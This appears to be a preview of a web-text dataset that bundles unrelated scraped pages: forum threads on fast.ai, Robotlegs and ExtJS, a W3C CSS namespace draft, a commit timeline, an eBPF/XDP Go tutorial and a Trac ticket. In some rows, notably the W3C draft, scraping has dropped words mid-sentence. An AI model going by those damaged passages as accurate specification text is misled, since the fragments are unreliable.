text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
Image segmentation with Unet. I put all image and mask attributes in a Pandas dataframe and process them, depending on the attributes. Code sample: def make_mask(row): """ Is called by DataBlock(getters=). Takes a list of paths to mask files from a Pandas column. Makes sure all masks are 8 bits per pixel. If there are multiple masks, merges them. Returns a PILMask.create() mask image. """ f = ColReader("mask") # PILMask.create() probably forces 8 bits per pixel. all_images = [np.asarray(PILMask.create(x)) for x in f(row)] image_stack = np.stack(all_images) image_union = np.amax(image_stack, axis=0) return PILMask.create(image_union) def make_image(row): """ Receives a Pandas row. Gets an image path from the "image" column. Makes sure all images are 8 bits per color channel. (There may be multiple color channels.) Returns a PILImage.create() image. """ f = ColReader("image") # PILImage.create() probably forces 8 bits per color channel. image_array = np.asarray(PILImage.create(f(row))) return PILImage.create(image_array) # Most images are 960 x 720. A few images are much larger. So we resize to 960 x 720 first. # The final resize is to the desired image size for the model. crop_datablock = DataBlock( blocks=(ImageBlock, MaskBlock), getters=[make_image, make_mask], splitter=TrainTestSplitter(stratify=crop_df["dataset"].to_list()), item_tfms=item_tfms, ) Image augmentation is done with Albumentations in the item_tfms which is not shown here. I have a separate question about that here: I need to differentiate between training vs validation in terms of the processing I apply to images and masks. I have a hard time doing that with item_tfms, as you can see in the previous thread. I think I could shift all that processing to the getter functions, since they already do some low level processing (changing the bits per pixel, merging masks, etc). There is one issue: how do I tell, from within a getter function, whether the image or the mask are for training or whether they are for validation?
https://forums.fast.ai/t/datablock-can-a-getter-tell-whether-the-image-is-for-training-vs-validation/99131
CC-MAIN-2022-40
refinedweb
323
62.04
Copyright © 2006 W3C® (MIT, ERCIM, Keio), All Rights Reserved. W3C liability, trademark and document use rules apply.-namespace” in the subject, preferably like this: “[css3-namespace] a draft of a module of CSS (Cascading Style Sheets). It is derived with minimal change from the CSS3 Namespace Enhancements syntax proposal from 1999 with which the CSS WG has been in agreement for many years and which is already implemented in user agents. The material from that proposal found its way into drafts of [SELECT], [CSS3SYN] and [CSS3VAL]. [SELECT] is currently a Candidate Recommendation. Unfortunately, [CSS3SYN] has dependencies on (potentially) all other CSS3 modules and this, plus work on CSS2.1, has delayed the availability of this specification. To break the chain of dependencies and allow faster progress on the Recommendation track, the present module has been split out. It is primarily intended as a CSS module, though it could also be referenced by [SVG12] or indeed [CSS21]. @namespacerule This section is informative. This specification defines the syntax for using namespaces in CSS. It introduces the @namespace rule for declaring a default namespace and for binding namespaces to namespace prefixes. This specification also defines a syntax for using those prefixes in namespace-qualified names, but does not define where such names are valid or what they mean. The terminology used in this specification is that of [XML-NAMES11]. Do we really need this sentence? It should be noted that this specification alone, but can claim conformance to this specification if it satisfies the conformance requirements in this specification when implementing CSS or another host language that normatively references this specification. (see [RFC2119]). However, for readability, these words do not appear in all uppercase letters in this specification. All of the text of this specification is normative except examples, notes, and sections explicitly marked as non-normative. @namespacerule The @namespace at-rule declares a namespace prefix and associates it with a given namespace (a string). This namespace prefix can then be used in namespace-qualified names such as those described in the Selectors Module [SELECT] or the Values and Units module [CSS3 XML Namespaces [REC-XML-NAMES], syntax for the @namespace rule is as follows (using the notation from the Grammar appendix of CSS2.1 [CSS21]): namespace : NAMESPACE_SYM S* [namespace_prefix S*]? [STRING|URI] S* ';'S* ; namespace_prefix : IDENT ; with the new token: "@namespace" style sheet containing an invalid @namespace rule is non-conforming. A URI string parsed from the url() syntax must be treated as a literal string: no URI-specific normalization is applied. For this reason the string syntax is recommended, and the url() syntax discouraged deprecated?. The namespace prefix is declared only within the style sheet in which its @namespace rule appears, and not any style sheets imported by that style sheet, style sheets that import that style sheet, or any other style sheets applying to the document. A namespace prefix, once declared, represents the namespace for which it was declared and can be used to indicate the namespace of a namespace-qualified name.-XML-NAMES], in Selectors [SELECT] the default namespace applies to type selectors—but it does not apply to attribute selectors. There is no default default namespace: modules that assign unqualified names to the default namespace must define how those unqualified names are to be interpreted when no default namespace is declared. Namespace prefixes are, like CSS property names, case-insensitive. If a namespace prefix or default namespace is declared more than once only the last declaration shall be used. A. Some contexts. CSS qualified names can be used in (for example) selectors and property values as described in other modules. Those modules should define the use of a namespace prefix that has not been properly declared as a parsing error that will cause the selector or declaration (etc.) to be considered invalid and ignored. This draft borrows heavily from earlier drafts on CSS namespace support by Chris Lilley and by Peter Linss [CSS3NAMESPACE] Ian Hickson, Bjöern Höhrmann, Anne van Kesteren, and L. David Baron for their comments.
http://www.w3.org/TR/2006/WD-css3-namespace-20060828/
CC-MAIN-2016-22
refinedweb
669
53.1
what is the best way to listen for key events Hi All I hope someone can help I am creating a adobe air for android app and i have a problem. I need to navigate through tha app using the hardware key on the phone which dispatches the a keyCode : Keyboard.BACK. Now how i have wired everything up is. In the app contex I have added a listenerto the stage see below: contextView.stage.addEventListener(KeyboardEvent.KEY_DOWN, dispatchEvent); commandMap.mapEvent(keyboardEvent.KEY_DOWN, Backcommand, KeyboardEvent) This listens for a keyevent then calls the backCommand which takes action. The back command looks like the below: public class BackCommand extends Command{ [Inject] public var appModel:AppModel; [Inject] public var evt:KeyboardEvent; public override function execute ( ):void { evt.preventDefault(); evt.stopImmediatePropagation(); //make sure we have a section to go back to appModel.currHistoryPos--; if(appModel.currHistoryPos <0){ //reset the var. if we dont it will error appModel.currHistoryPos = -1; } //trace("key registered.... " + evt, "curr back num is: "+appModel.currHistoryPos); if (evt.keyCode == Keyboard.BACK) { if (appModel.currHistoryPos >= 0) { if (exitSection(appModel.currSection) == true) { //if we have reached the top of the app sections either library, browse or create exit the app appModel.nextSection = Sections.EXIT; dispatch(new AppEvent(AppEvent.SECTION_CHANGE)); }else { //only iof the hardware back key has been pressed do this trace("//================ key registered.... " + appModel.currHistoryPos); //tells the app we are using it's buttons to naviagte. This is used for the history memory so when back is pressed we can go back to previous section appModel.navType = "back"; //grab the new section and set it to be the next section to see then disaptch event to app to jump to that section var backSection:String = appModel.backMemory[appModel.currHistoryPos]; appModel.nextSection = backSection; dispatch(new AppEvent(AppEvent.SECTION_CHANGE)); } } } } The problem I am having is the back seems to exit the app which it should not do. it should just move to the previous view. So I was wondering am I setting up the keyboard event right. if you could gide me with an example that ould be great. regards Mike :) Comments are currently closed for this discussion. You can start a new one. Keyboard shortcuts Generic Comment Form You can use Command ⌘ instead of Control ^ on Mac 1 Posted by Michal Wroblews... on 27 Jul, 2011 08:36 PM You should use evt.preventDefault()to prevent the app from closing at Back button and you're using it. Please try to do the same without any command mapping for a check. Just addEventListener and in handler method use preventDefault(), remove evt.stopImmediatePropagation();by the way. And what is contextView.stage.addEventListener(KeyboardEvent.KEY_DOWN, dispatchEvent);doing? Maybe dispatchEvent handler stops immediate propagation? 2 Posted by Mike oscar on 27 Jul, 2011 08:52 PM Hi michal I have tried as without command and it works but this my implementation above does not work. So this leads me to believe that I need to do this differently as I think the preventdefault() is not working the way it is. Is there a different way to do the above so the event is passed directly to the function. Any code will help. Regards mike :) 3 Posted by Michal Wroblews... on 28 Jul, 2011 10:37 AM Looks like not the same instance of the event is passed to the command or something else causes the problem. Do it that way: 1. Leave listener without the command. It will prevent the default behavior. Don't use stopImmediatePropagation(). 2. Use your own logic as you described in your command. You don't have to preventDefault here. Please debug your application and place breakpoints in both command and key listener. Check if events are the same instances (compare memory pointers) Thanks Mike 4 Posted by Stray on 28 Jul, 2011 10:44 AM The clone() will mean that the events are unlikely to be the same instances. 5 Posted by Michal Wroblews... on 28 Jul, 2011 10:45 AM When events are cloned? 6 Posted by Shawn on 29 Jul, 2011 09:46 PM Why would RL clone the event? Can't it just pass along the original reference to the command? 7 Posted by Michal Wroblews... on 29 Jul, 2011 09:57 PM Shawn, no idea. I'm using SignalCommandMap and if I need to pass an event I just pass it there :) So I haven't faced the problem. Thanks for letting us know. Probably it should be filled as a bug. Mike Support Staff 8 Posted by Robert Penner on 14 Sep, 2011 07:25 PM If you redispatch an Event, EventDispatcher automatically clones it, because the Event's target and currentTarget properties could be different. Ondina D.F. closed this discussion on 21 Nov, 2011 09:09 AM.
http://robotlegs.tenderapp.com/discussions/problems/354-what-is-the-best-way-to-listen-for-key-events
CC-MAIN-2019-13
refinedweb
794
67.76
How to create pages in DokuWiki Now that you've installed DokuWiki, the next thing we're going to show you how to do is create your first page. We're going to go over the basics of creating pages, and in future tutorials we'll go more indepth. By Default, anyone can create pages in DokuWiki. To create a new page, you'll actually use the search feature within your wiki to search for the page that you want to create. After searching, as long as the page doesn't exist, DokuWiki will give you a link you can click on that will allow you to create this page. Let's learn how to create pages in DokuWiki. How to create a page - Log into DokuWiki Type the Name of the page you want to create in the search field towards the top right of your DokuWIki site. In our testing, we want to create a page named "HTML Basics". As you can see in the screenshot to the right, we searched our DokiWiki site for this page. Click the Magnifying glass to search the title. Next, if the title is not already created on the site, you should see a "Nothing was found" in the Search results. Click Create this page from the menu to the right. Enter the text you want for the header title and the body text. Click Save Now the page will show the new header title and the body text you added to the content of the page. Also, due to the nature of wiki software, other people who read the article you just created can improve upon it and edit it Note! To find your pages on your DokuWiki site, click the "Sitemap" link towards the top right of your DokuWiki site. There you will find a list of all pages that are on your site. That's all there is to it! Again, we just went over the very basics of creating page. When creating pages, you will want to know how to create namespaces. Namespaces organize your pages into categories for easy management. Click here to learn how to format content and add images to your new page as well.
http://www.inmotionhosting.com/support/edu/dokuwiki/writing-content-dokuwiki/edit-create-delete-restore-dokuwiki
CC-MAIN-2016-26
refinedweb
370
80.11
… - 7:18 PM Changeset [2705] by - * mean.c: implement pipi_mean() to compute a mean image. - 7:18 PM Changeset [2704] by - * Support --autocontrast in pipi. - 12:57 AM Changeset [2703] by - * convolution.c: support for wrap-around in convolutions. * pipi.c: … - 12:35 AM Ticket #43 (inherit attributes) created by - Image attributes such as wrap behaviour should be inherited when … - 12:02 AM Changeset [2702] by - * pipi.c: implement the "--gray" flag for grayscale conversion. - 12:02 AM Changeset [2701] by - * convolution_template.h: split convolution routines into separate … Aug 11, 2008: - 10:02 PM Changeset [2700] by - * jajuni.c: add Jarvis-Judice-Ninke dithering. It's a … - … - 10:02 PM Changeset [2695] by - * codec.c: support for stock images in pipi_load(). * stock.c: start … - 2:51 AM Changeset [2694] by - * context.c: implement various dithering commands and Gaussian blur. … - 2:51 AM Changeset [2693] by - * Start working on "pipi", a command-line libpipi tool. It will be … - 2:50 AM Changeset [2692] by - * Add functions that handle a stack-based processing queue. Aug 10, 2008: - 7:01 PM Changeset [2691] by - * More testing. - 7:00 PM Changeset [2690] by - * Testing. - 6:55 PM Changeset [2689] by - * Experiment with the trac menu. - 6:37 PM Changeset [2688] by - * Fix top menu. - 6:30 PM Changeset [2687] by - * Smaller buttons. * Try to create a menu header. - 5:29 PM Changeset [2686] by - * Fix stylesheet path and name. - 5:18 PM Changeset [2685] by - * cgi-bin should be part of the trac installation. - 5:16 PM Changeset [2684] by - * convolution.c: fix a small memory leak in the convolution filter. - 5:16 PM Changeset [2683] by - * Move template stuff to the Trac 0.11 layout. - 5:01 PM Changeset [2682] by - * Import files for a Trac 0.11 installation. Aug 8, 2008: - 8:11 PM Changeset [2681] by - * blur.c: implement box blur; currently runs in O(n) but we could make … - 8:11 PM Changeset [2680] by - * autocontrast.c: simple autocontrast filter; does not work very well. - 8:11 PM Changeset [2679] by - * Get rid of test.c, it was no longer useful anyway. - 8:07 PM Changeset [2678] by - * Handle alpha layer in floodfill (but don't make it conditionnal to … - 10:21 AM Changeset [2677] by - * Test stuff for the Rubik's cube colour reduction. Aug 7, 2008: - 5:21 PM Changeset [2676] by - * First shot of a floodfiller (both u32 and float, 4 neighbours) Aug 6, 2008: - 10:58 PM Changeset [2675] by - * Don't crash when an option with mandatory argument is passed last - 10:45 PM Changeset [2674] by - * Fix a fd leak when connection to the socket fails Aug 5, 2008: - 2:19 PM Changeset [2673] by - * As to_grab and to_start are now part of screen_list, no need to have … - 12:31 PM libpipi edited by - (diff) Aug 4, 2008: - 11:50 PM Changeset [2672] by - * dbs.c: generate the initial halftone using random dithering instead … - 11:49 PM Changeset [2671] by - * random.c: implement random dithering using a deterministic pseudo-RNG. - 9:08 PM libpipi created by - libpipi page - 7:23 PM Changeset [2670] by - * Dithering algorithms no longer modify the original image. - 7:23 PM Changeset [2669] by - * pipi.c: fix a memory leak caused by empty picture having … - 7:23 PM Changeset [2668] by - * pipi.c: implement pipi_copy(). - 7:23 PM Changeset [2667] by - * pixels.c: store byte length and bits-per-pixel value in the … - 7:23 PM Changeset [2666] by - * Prefix dithering functions with _dither_ to avoid namespace cluttering. - 7:23 PM Changeset [2665] by - * ordered.c: implement Bayer dithering (pretty trivial). Aug 3, 2008: - 8:36 PM Changeset [2664] by - * dbs.c: optimise DBS by ignoring 16x16 cells that had no pixel … - 8:36 PM Changeset [2663] by - * dbs.c: improve the DBS human visual system kernel by adding two … - 6:03 PM Changeset [2662] by - * sharpen.c: add a sharpen filter example, using our generic … - 5:54 PM Changeset [2661] by - * blur.c: remove the blurring code and use our generic convolution … - 5:54 PM Changeset [2660] by - * convolution.c: automatically detect when a convolution filter is … - 5:54 PM Changeset [2659] by - * blur.c: fix the blur example’s argument checking. - 5:54 PM Changeset [2658] by - * convolution.c: generic convolution method. Does not take advantage … - 1:48 PM Changeset [2657] by - * edd.c: output MSD instead of RMSD in the displacement computation. - 1:48 PM Changeset [2656] by - * Error diffusion methods now support either raster or serpentine scan. - 1:47 PM Changeset [2655] by - * pixels.c: support more conversion combinations. - 5:31 AM Changeset [2654] by - * ostromoukhov.c: Ostromoukhov's simple error diffusion algorithm. - 5:30 AM Changeset [2653] by - * floydsteinberg.c: perform Floyd-Steinberg dithering on a serpentine path. - 4:17 AM Changeset [2652] by - * dither.c: add an example program for dithering methods. - 4:17 AM Changeset [2651] by - * dbs.c: new dithering function: Direct Binary Search. One of the best … - 4:17 AM Changeset [2650] by - * measure.c: there is now pipi_measure_msd in addition to … Aug 2, 2008: - 11:24 PM Changeset [2649] by - * Check a few more realloc, and return when they fail - 11:22 PM Changeset [2648] by - * Check a few more malloc, and output errors on stderr - 6:56 PM Changeset [2647] by - * edd.c: output E_fast as well. - 2:47 PM Changeset [2646] by - * Set default (temporary) size of initial term to 80x80 to avoid … - 2:29 PM Changeset [2645] by - * Move the end of options parsing into handle_command_line - 2:13 PM Changeset [2644] by - * edd.c: example program that computes the Floyd-Steinberg … - 2:12 PM Changeset [2643] by - * blur.c: adapt the kernel size to large values of dx and/or dy. * … - 1:32 PM Changeset [2642] by - * Moved most of the command line parsing to its own function - 12:53 PM Changeset [2641] by - * Added window list and window selection by name using ctrl-a-" - 12:52 PM Changeset [2640] by - * Fill TODO with nice wishes - 12:23 PM Changeset [2639] by - * We can now choose current window with ctrl-a-N where N is 0-9 - 11:51 AM Changeset [2638] by - * Don't quit if a refresh doesn't work. Problem must be tougher as … - 2:01 AM Changeset [2637] by - * Add Floyd-Steinberg grayscale dithering. - 2:01 AM Changeset [2636] by - * pixels.c: fix a typo in the dithering method that could cause crashes. - 2:01 AM Changeset [2635] by - * measure.c: started writing error/measure functions. First one is RMSD. - 2:01 AM Changeset [2634] by - * blur.c: support for greyscale images. - 2:01 AM Changeset [2633] by - * pixels.c: start supporting grayscale images. - 2:01 AM Changeset [2632] by - * codec.c: bump Imlib2 and OpenCV priorities over SDL. - 2:01 AM Changeset [2631] by - * opencv.c: bring the OpenCV codec up to date. - 2:00 AM Changeset [2630] by - * pixels.c: add support for 24-bpp BGR format. - 2:00 AM Changeset [2629] by - * pipi.c: reimplement pipi_new() without relying on the underlying … - 2:00 AM Changeset [2628] by - * configure.ac: fix the OpenCV detection by using pkg.
http://caca.zoy.org/timeline?from=2008-08-27T11%3A44%3A26%2B02%3A00&precision=second
CC-MAIN-2014-52
refinedweb
1,186
77.13
Search: Search took 0.04 seconds. - 8 Feb 2010 2:26 AM beforeselect event of a combo fires after it shows the drop down data. then.. i've found another event... expand : ( Ext.form.ComboBox combo ) it... - 7 Feb 2010 4:31 PM I explore the combo's method/event/property then noticed the following that might be help to filter my drop down data. 1) doQuery( String query, Boolean forceAll ) : ... - 7 Feb 2010 4:16 PM var reader = new Ext.data.JsonReader({ totalProperty: 'total', successProperty: 'success', idProperty: 'id', root: 'data', messageProperty: 'message' // <-- New... - 4 Feb 2010 11:45 PM same result Sir var comboStatus = new Ext.form.ComboBox({ mode: 'local', lazyRender: true, forceSelection: true, selectOnFocus: true, store: new Ext.data.ArrayStore({ - 4 Feb 2010 11:17 PM the initial value of combobox doesn't display.. please see the attached image and codes below... 18601 var comboStatus = new Ext.form.ComboBox({ mode: 'local', lazyRender: true, - 4 Feb 2010 10:23 PM code from ComboBox API Doc var combo = new Ext.form.ComboBox({ mode: 'local', store: new Ext.data.ArrayStore({ id: 0, fields: [ 'myId', // numeric value... - 4 Feb 2010 10:11 PM combobox's store is automatically calls by the editorgrid? if yes, the combobox's store must have same id with the editorgrid's store in order to map the corresponding row inside the editorgrid...? - 4 Feb 2010 9:51 PM - Replies - 2 - Views - 848 forgot the quotes and brackets... correct json string format json = "{" + "'total':8, 'success':true, 'message':'message1', " + " 'data':[" + " {'id':1,... - 4 Feb 2010 9:45 PM - Replies - 2 - Views - 848 i'll check my json... it seems to be invalid.. - 4 Feb 2010 9:25 PM - Replies - 2 - Views - 848 most of the code is base from Ext.data.DataWriter Example the below code successfully called the Ext.data.HttpProxy api read url and confirmed by checking the firebug watch & console. there is... - 4 Feb 2010 7:28 PM - Replies - 3 - Views - 1,273 This thread was [RESOLVED] please refer to Animal's & Condor's messages. - 4 Feb 2010 7:26 PM . - 4 Feb 2010 7:22 PM Thanks Sir jgarcia, will try beforeedit event.. Thanks Sir ironlion for the beforeedit event sample But this thread, focusing on the combobox values only.. and my other thread you stated is... - 4 Feb 2010 7:09 PM - Replies - 6 - Views - 1,628 Sir ironlion... those threads are started by me.. those are different topics.. - 4 Feb 2010 6:28 PM Thanks Sir ironlion.. Yes Sir you're right, I created editor grid and successfully fills the combobox but would like do some customization on the values. in every row in the editor grid, the... - 4 Feb 2010 6:13 PM - Replies - 6 - Views - 1,628 >>the renderer's function's arguments are automatically pass by the ExtJs? >Yes! Thanks for confirmation Sir. actually that is one the problem with the API Doc...all possible arguments in the... - 4 Feb 2010 4:32 PM - Replies - 6 - Views - 1,628 Sir Thanks a lot.. the renderer's function's arguments are automatically pass by the ExtJs? the counter variable inside the renderer's function is your own variable? or provided by the ExtJs? ... - 4 Feb 2010 4:06 PM yes Sir, based on the grid's store responded by the server. or is there other approach.. e.g. displayed values when drop down row1 : OK ... - 4 Feb 2010 3:10 AM i created combobox within the grid but would like to fills the combobox data depends on the server's response.. the server's response is array inside the json string. - 3 Feb 2010 6:43 PM - Replies - 6 - Views - 1,628 the grid fills data from the server and set the comboBox's initial displayed value comboBox in grid contains "OK" "OK Error" "Not Good" would like to disable the comboBox if the initial displayed... - 2 Feb 2010 11:33 PM - Replies - 2 - Views - 2,549 Please visit and vote in order to be full pledged client framework.. - 20 Jan 2010 8:39 PM - Replies - 4 - Views - 930 1. buttonAlign works great with buttons. thanks ;) 2. i removed the fieldLabel because i've noticed that i need only the textfield... but it shows nothing but a right indented Search button... ... - 20 Jan 2010 8:17 PM - Replies - 3 - Views - 1,273 i have button with click event then would like to execute a custom created url protocol in my local pc. it is easy to implement this using <a> but please guide me using Ext.Button click event... ... - 20 Jan 2010 1:43 AM - Replies - 2 - Views - 2,126 Rosenprot.layouts.StandardLayout was successfully created.. then error occured during Viewport creation... entry point: Ext.namespace('Rosenprot', 'Rosenprot.layouts'); ... - 20 Jan 2010 12:00 AM - Replies - 4 - Views - 930 i am not using 2.x.. i am using 3.1 as stated with my signature.. could you assist me to placed it? Results 1 to 25 of 94
http://www.sencha.com/forum/search.php?s=c606a6287d4f38613e026b6d594a35cb&searchid=3105162
CC-MAIN-2013-20
refinedweb
828
77.23
eBPF has a thriving ecosystem with a plethora of educational resources both on the subject of eBPF itself and its various application, including XDP. Where it becomes confusing is when it comes to the choice of libraries and tools to interact with and orchestrate eBPF. Here you have to select between a Python-based BCC framework, C-based libbpf and a range of Go-based libraries from Dropbox, Cilium, Aqua and Calico. Another important area that is often overlooked is the “productionisation” of the eBPF code, i.e. going from manually instrumented examples towards production-grade applications like Cilium. In this post, I’ll document some of my findings in this space, specifically in the context of writing a network (XDP) application with a userspace controller written in Go. Choosing an eBPF library In most cases, an eBPF library is there to help you achieve two things: - Load eBPF programs and maps into the kernel and perform relocations, associating an eBPF program with the correct map via its file descriptor. - Interact with eBPF maps, allowing all the standard CRUD operations on the key/value pairs stored in those maps. Some libraries may also help you attach your eBPF program to a specific hook, although for networking use case this may easily be done with any existing netlink API library. When it comes to the choice of an eBPF library, I’m not the only one confused (see [1],[2]). The truth is each library has its own unique scope and limitations: - Calico implements a Go wrapper around CLI commands made with bpftool and iproute2. - Aqua implements a Go wrapper around libbpf C library. - Dropbox supports a small set of programs but has a very clean and convenient user API. - IO Visor’s gobpf is a collection of go bindings for the BCC framework which has a stronger focus on tracing and profiling. - Cilium and Cloudflare are maintaining a pure Go library (referred to below as libbpf-go) that abstracts all eBPF syscalls behind a native Go interface. For my network-specific use case, I’ve ended up using libbpf-go due to the fact that it’s used by Cilium and Cloudflare and has an active community, although I really liked (the simplicity of) the one from Dropbox and could’ve used it as well. In order to familiarise myself with the development process, I’ve decided to implement an XDP cross-connect application, which has a very niche but important use case in network topology emulation. The goal is to have an application that watches a configuration file and ensures that local interfaces are interconnected according to the YAML spec from that file. Here is a high-level overview of how xdp-xconnect works: The following sections will describe the application build and delivery process step-by-step, focusing more on integration and less on the actual code. Full code for xdp-xconnect is available on Github. Step 1 - Writing the eBPF code Normally this would be the main section of any “Getting Started with eBPF” article, however this time it’s not the focus. I don’t think I can help others learn how to write eBPF, however, I can refer to some very good resources that can: - Generic eBPF theory is covered in a lot of details on ebpf.io and Cilium’s eBPF and XDP reference guide. - The best place for some hands-on practice with eBPF and XDP is the xdp-tutorial. It’s an amazing resource that is definitely worth reading even if you don’t end up doing the assignments. - Cilium source code and it’s analysis in [1] and [2]. My eBPF program is very simple, it consists of a single call to an eBPF helper function , which redirects all packets from one interface to another based on the index of the incoming interface. #include <linux/bpf.h> #include <bpf/bpf_helpers.h> SEC("xdp") int xdp_xconnect(struct xdp_md *ctx) { return bpf_redirect_map(&xconnect_map, ctx->ingress_ifindex, 0); } In order to compile the above program, we need to provide search paths for all the included header files. The easiest way to do that is to make a copy of everything under linux/tools/lib/bpf/, however, this will include a lot of unnecessary files. So an alternative is to create a list of dependencies: $ clang -MD -MF xconnect.d -target bpf -I ~/linux/tools/lib/bpf -c xconnect.c Now we can make a local copy of only a small number of files specified in xconnect.d and use the following command to compile eBPF code for the local CPU architecture: $ clang -target bpf -Wall -O2 -emit-llvm -g -Iinclude -c xconnect.c -o - | \ llc -march=bpf -mcpu=probe -filetype=obj -o xconnect.o The resulting ELF file is what we’d need to provide to our Go library in the next step. Step 2 - Writing the Go code Compiled eBPF programs and maps can be loaded by libbpf-go with just a few instructions. By adding a struct with ebpf tags we can automate the relocation procedure so that our program knows where to find its map. spec, err := ebpf.LoadCollectionSpec("ebpf/xconnect.o") if err != nil { panic(err) } var objs struct { XCProg *ebpf.Program `ebpf:"xdp_xconnect"` XCMap *ebpf.Map `ebpf:"xconnect_map"` } if err := spec.LoadAndAssign(&objs, nil); err != nil { panic(err) } defer objs.XCProg.Close() defer objs.XCMap.Close() Type ebpf.Map has a set of methods that perform standard CRUD operations on the contents of the loaded map: err = objs.XCMap.Put(uint32(0), uint32(10)) var v0 uint32 err = objs.XCMap.Lookup(uint32(0), &v0) err = objs.XCMap.Delete(uint32(0)) The only step that’s not covered by libbpf-go is the attachment of programs to network hooks. This, however, can easily be accomplished by any existing netlink library, e.g. vishvananda/netlink, by associating a network link with a file descriptor of the loaded program: link, err := netlink.LinkByName("eth0") err = netlink.LinkSetXdpFdWithFlags(*link, c.objs.XCProg.FD(), 2) Note that I’m using the SKB_MODE XDP flag to work around the exiting veth driver caveat. Although the native XDP mode is considerably faster than any other eBPF hook, SKB_MODE may not be as fast due to the fact that packet headers have to be pre-parsed by the network stack (see video). Step 3 - Code Distribution At this point everything should have been ready to package and ship our application if it wasn’t for one problem - eBPF code portability. Historically, this process involved copying of the eBPF source code to the target platform, pulling in the required kernel headers and compiling it for the specific kernel version. This problem is especially pronounced for tracing/monitoring/profiling use cases which may require access to pretty much any kernel data structure, so the only solution is to introduce another layer of indirection (see CO-RE). Network use cases, on the other hand, rely on a relatively small and stable subset of kernel types, so they don’t suffer from the same kind of problems as their tracing and profiling counterparts. Based on what I’ve seen so far, the two most common code packaging approaches are: - Ship eBPF code together with the required kernel headers, assuming they match the underlying kernel (see Cilium). - Ship eBPF code and pull in the kernel headers on the target platform. In both of these cases, the eBPF code is still compiled on that target platform which is an extra step that needs to be performed before the user-space application can start. However, there’s an alternative, which is to pre-compile the eBPF code and only ship the ELF files. This is exactly what can be done with bpf2go, which can embed the compiled code into a Go package. It relies on go generate to produce a new file with compiled eBPF and libbpf-go skeleton code, the only requirement being the //go:generate instruction. Once generated though, our eBPF program can be loaded with just a few lines (note the absence of any arguments): specs, err := newXdpSpecs() objs, err := specs.Load(nil) The obvious benefit of this approach is that we no longer need to compile on the target machine and can ship both eBPF and userspace Go code in a single package or Go binary. This is great because it allows us to use our application not only as a binary but also import it into any 3rd party Go applications (see usage example). Reading and Interesting References Generic Theory: BCC and libbpf: eBPF/XDP performance: Linus Kernel Coding Style: libbpf-go example programs: bpf2go: XDP example programs:
https://networkop.co.uk/post/2021-03-ebpf-intro/
CC-MAIN-2021-49
refinedweb
1,438
60.75
Opened 10 years ago Closed 9 years ago Last modified 8 years ago #4280 closed defect (wontfix) ImportError: No module named posixpath Description In r4363 accessing any trac url: Traceback (most recent call last): File "/usr/lib/python2.4/site-packages/trac/web/api.py", line 319, in send_error if self.hdf and template.endswith('.cs'): # FIXME: remove this File "/usr/lib/python2.4/site-packages/trac/web/api.py", line 161, in __getattr__ value = self.callbacks[name](self) File "/usr/lib/python2.4/site-packages/trac/web/main.py", line 251, in _get_hdf hdf = HDFWrapper(loadpaths=Chrome(self.env).get_all_templates_dirs()) File "/usr/lib/python2.4/site-packages/trac/web/chrome.py", line 305, in get_all_templates_dirs dirs += provider.get_templates_dirs() File "build/bdist.linux-i686/egg/tracrpc/web_ui.py", line 76, in get_templates_dirs File "/usr/lib/python2.4/site-packages/setuptools-0.7a1dev_r52437-py2.4.egg/pkg_resources.py", line 16, in ? import sys, os, zipimport, time, re, imp, new, pkgutil # XXX File "/usr/lib/python2.4/os.py", line 48, in ? import posixpath as path ImportError: No module named posixpath Attachments (0) Change History (9) comment:1 Changed 10 years ago by comment:2 follow-up: 6 Changed 10 years ago by I don't think this issue is related to your installation. I get the same error, and posixpath.py does exit, and exists at the expected place ( /usr/lib/python2.4/posixpath.py on my machine) The trouble seems to come from a conflict with setuptools. I'm not able to understand the exact issue, but AFAICT: When XmlRpcPlugin imports resource_filename from the pkg_resources.py file of the setuptools, the Python interpreters fails to import standard module. Again, I don't understand the exact issue, but I got rid of this error when I moved the from pkg_resources import resource_filename statement from the get_templates() method up to the top of the file, along with the other import directives. - I'm not sure this is the right way to do, this is probably more a workaround - I really wish a Python expert can explain why this collision -or whatever it is- occurs. Note that this occurs with setuptools 0.6c3 and 0.7a1 - at least. This error is not related to posixpath, as if you disable the related code Trac will fail with other system modules that are imported from the setuptool right after the os.py import. I think this error can also occur with other plugin (not only XmlRpcPlugin), this is why I'm reopening this ticket on t.e.o. rather than filling a bug on TracHacks. The code used in XmlRpcPlugin is a pretty standard code that have been duplicated in most of the plugins that relies on templates. I don't know why the error does not occur in the other plugins though. Removing the import posixpath directive from the wiki.py XmlRpcPlugin file does not help. comment:3 follow-up: 4 Changed 10 years ago by After reading eblot's comment, I think the issue still needs an explanation, even if we're not seeing it anymore in Trac. comment:4 Changed 10 years ago by comment:5 Changed 10 years ago by I just encountered this error also, after upgrading FC5→FC6 and installing the setuptools RPM (and removing the egg). The fix also works for me. comment:6 Changed 9 years ago by … I got rid of this error when I moved thefrom pkg_resources import resource_filename statement from the get_templates()method up to the top of the file, along with the other importdirectives. There also have been numerous reports of similar strange import error for import statements made in methods rather than at the toplevel for MySQLdb in the past (see #4459). More recently someone reported a similar error for rst.py concerning the docutils imports, and a similar change fixed it. At any rate, this is a tracrpc (is that the XMLRPC plugin?) issue, and should be fixed there. comment:7 Changed 9 years ago by You are not alone. Please see After installing XML-RPC revision 2624 Trac fails with "ImportError: No module named posixpath" comment:8 Changed 9 years ago by People upgrading from 0.10.4 to 0.11.1: You may see this because you have the old XmlRpcPlugin and/or the CtxtnavAddPlugin installed. Disable (remove the enabling lines in trac.ini) and/or delete the plugin files (including the copy in the PYTHON_EGG_CACHE). Then try upgrading again. comment:9 Changed 8 years ago by BTW, this is now fixed for th:XmlRpcPlugin in th:changeset:6106. Uh. My Bad. From the traceback I see that this is not related to trac but my python installation.
https://trac.edgewall.org/ticket/4280
CC-MAIN-2017-17
refinedweb
779
58.08
